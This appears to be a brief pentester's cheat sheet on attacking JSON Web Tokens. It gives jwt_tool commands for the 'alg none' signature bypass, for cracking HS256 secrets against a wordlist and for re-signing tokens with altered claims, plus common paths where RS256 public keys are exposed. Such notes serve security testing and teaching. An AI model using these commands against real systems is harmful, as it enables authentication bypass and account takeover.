JWT Token

Structure

https://auth0.com/docs/secure/tokens/json-web-tokens/json-web-token-structure

Debugger

Best online tool is https://token.dev JWT debugger.

JWT DebuggerSecurity Token Debugger

JWT Tool

https://github.com/ticarpi/jwt_tool

https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology

Signature Verification Attacks

Algorithm None Bypass

./jwt_tool.py JWT_TOKEN -X a

HS256 - HMAC secret cracking

python3 ./jwt_tool.py JWTTOKEN --crack --dict /path/wordlist/secrets.txt

# modify payload claims
python3 ./jwt_tool.py JWTTOKEN --sign hs256 --password secret -T

RS256 - Find public Key

Searching public key for cracking the primary key

https://github.com/ticarpi/jwt_tool/wiki/Finding-Public-Keys

/.well-known/jwks.json
/openid/connect/jwks.json
/jwks.json
/api/keys
/api/v1/keys